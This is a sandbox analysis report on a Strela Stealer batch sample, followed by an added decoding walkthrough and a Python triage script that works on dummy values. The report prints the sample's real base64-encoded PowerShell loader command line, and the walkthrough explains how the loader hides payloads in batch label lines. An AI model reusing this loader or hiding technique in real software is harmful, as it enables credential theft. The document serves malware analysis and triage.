Windows
Analysis Report
demo.bat1.bat
Overview
General Information
Detection
Batch Injector, Strela Stealer
Score: 100 (range: 0 - 100)
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Batch Injector
Yara detected Generic Stealer
Yara detected Powershell decode and execute
Yara detected Strela Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses powershell cmdlets to delay payload execution
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 7996, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\demo.bat1.bat" ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8004, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 8048, cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\demo.bat1.bat", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8056, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8104, cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskYXNidmwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGFzYnZsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRhc2J2bCIgLUZvcmVncm91bmREb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRhc2J2bCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkYXNidmwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gYWJocWcoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ214b1B2TkZBYUZIZmtzR0lSQWpJT2MwellwV0lHYjluOGVGOURwYjFYU0U9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJzJZK1BsWjJPc0ZySTJwTEI3anBPZkE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gdnZ1d3UoJHBhcmFtX3Zhcil7CSR1YnJycj1OZXctT2JqZWN0IFN5c3R
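Base64-decoding the argument carried by the powershell.exe command line above (the report's own data, which is cut off where the command line is) gives a UTF-8 PowerShell stage that does the following: it sets $asbvl = "C:\Users\$userName\dwm.bat", reads that file line by line, looks for a line matching the regex ^::: ?(.+)$, base64-decodes the captured text, reads the bytes as UTF-16LE ([System.Text.Encoding]::Unicode) and hands the result to Invoke-Expression. The same stage defines a function abhqg that is an AES decryptor in CBC mode with PKCS7 padding, with a hard-coded 32-byte key and 16-byte IV given as base64 literals. A line beginning with :: is a label that cmd.exe never executes, so the embedded payload is inert for the batch interpreter and only becomes code once PowerShell greps for it. This is what the signatures "Yara detected Powershell decode and execute", "Bypasses PowerShell execution policy" (-ep bypass) and "Drops script at startup location" are seeing.

The script below is an added example, not part of the sandbox report or of the sample, that re-implements this decode chain in Python so a batch file of the same construction can be triaged offline. Everything it operates on is constructed inside the script: the stage-1 text is a shortened rewrite that keeps the sample's variable names and dwm.bat path, the inner stage is a placeholder string, and the AES key/IV are dummy byte sequences, not the sample's values. How the real command line consumes the decoded text is not visible in the truncated report, so the example assumes Invoke-Expression.

```python
import base64
import re
from typing import Optional

# ---- Constructed sample input (NOT the report's real payload) -------------
# Shape follows the decoded stage-1 script in the report ($asbvl, abhqg and
# the dwm.bat path are the sample's names); body, inner stage and key/IV are
# placeholders built here.
DUMMY_KEY_B64 = base64.b64encode(bytes(range(32))).decode()  # 32 bytes -> AES-256
DUMMY_IV_B64 = base64.b64encode(bytes(range(16))).decode()   # 16-byte CBC IV

STAGE1_SCRIPT = (
    "$userName = $env:USERNAME;"
    '$asbvl = "C:\\Users\\$userName\\dwm.bat";'
    "foreach ($line in [System.IO.File]::ReadAllLines($asbvl)) {"
    " if ($line -match '^::: ?(.+)$') {"
    " Invoke-Expression ([System.Text.Encoding]::Unicode.GetString("
    "[System.Convert]::FromBase64String($matches[1].Trim()))); break } };"
    "function abhqg($param_var){"
    "$aes_var=[System.Security.Cryptography.Aes]::Create();"
    "$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;"
    "$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;"
    f"$aes_var.Key=[System.Convert]::FromBase64String('{DUMMY_KEY_B64}');"
    f"$aes_var.IV=[System.Convert]::FromBase64String('{DUMMY_IV_B64}');"
    "$aes_var.CreateDecryptor().TransformFinalBlock($param_var,0,$param_var.Length)}"
)

INNER_STAGE = "Write-Host 'placeholder stage 2'"  # stands in for the real stage 2

# Assumption: the batch launches powershell.exe with the stage-1 text as a
# UTF-8 base64 literal and feeds the decoded string to Invoke-Expression.
SAMPLE_CMDLINE = (
    '"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-noprofile -windowstyle hidden -ep bypass -Command "
    '"Invoke-Expression ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\''
    + base64.b64encode(STAGE1_SCRIPT.encode("utf-8")).decode()
    + "')))\""
)

SAMPLE_BATCH = "\r\n".join([
    "@echo off",
    # '::' opens a label line that cmd.exe never executes: the base64 is inert
    # for cmd but is data for the PowerShell stage that searches for it.
    "::: " + base64.b64encode(INNER_STAGE.encode("utf-16-le")).decode(),
    SAMPLE_CMDLINE,
])

# ---- Decoder -----------------------------------------------------------------
B64_IN_CMDLINE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
MARKER = re.compile(r"^::: ?(.+)$")          # the regex the loader itself uses
AES_PARAM = re.compile(
    r"\.(Key|IV)\s*=\s*\[System\.Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)")
BAT_PATH = re.compile(r'"([A-Za-z]:\\[^"]*\.bat)"')


def extract_stage1(cmdline: str) -> str:
    """Stage 1: the UTF-8 script hidden in the powershell.exe command line."""
    m = B64_IN_CMDLINE.search(cmdline)
    if not m:
        raise ValueError("no FromBase64String('...') literal in command line")
    return base64.b64decode(m.group(1)).decode("utf-8")


def extract_stage2(batch_text: str) -> Optional[str]:
    """Stage 2: first ':::' marker line, base64 -> UTF-16LE, as the loader does."""
    for line in batch_text.splitlines():
        m = MARKER.match(line)
        if m:
            return base64.b64decode(m.group(1).strip()).decode("utf-16-le")
    return None


def extract_aes_params(script: str) -> dict:
    """Pull the hard-coded AES key/IV out of the stage-1 text and size them."""
    found = {name: base64.b64decode(b64) for name, b64 in AES_PARAM.findall(script)}
    key, iv = found.get("Key", b""), found.get("IV", b"")
    return {"key": key, "iv": iv, "key_bits": len(key) * 8, "iv_len": len(iv),
            "mode": "CBC" if "CipherMode]::CBC" in script else "unknown"}


def triage(batch_text: str) -> dict:
    """Run the whole chain over a batch file and return the recovered artefacts."""
    launcher = next((l for l in batch_text.splitlines() if "powershell" in l.lower()), None)
    if launcher is None:
        raise ValueError("no powershell launcher line in batch file")
    stage1 = extract_stage1(launcher)
    path = BAT_PATH.search(stage1)
    return {
        "stage1": stage1,
        "drop_path": path.group(1) if path else None,  # where stage 1 expects the .bat
        "aes": extract_aes_params(stage1),
        "stage2": extract_stage2(batch_text),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_BATCH)
    print("expected batch path:", result["drop_path"])
    print("AES:", result["aes"]["mode"], result["aes"]["key_bits"], "bit key")
    print("stage 2:", result["stage2"])
```

On a real sample, replace SAMPLE_BATCH with the contents of the dropped .bat file; the recovered key and IV feed an AES-CBC decrypt of whatever blob the rest of the stage-1 script (truncated in this report) passes to abhqg, and the drop path is the value to hunt for under Startup.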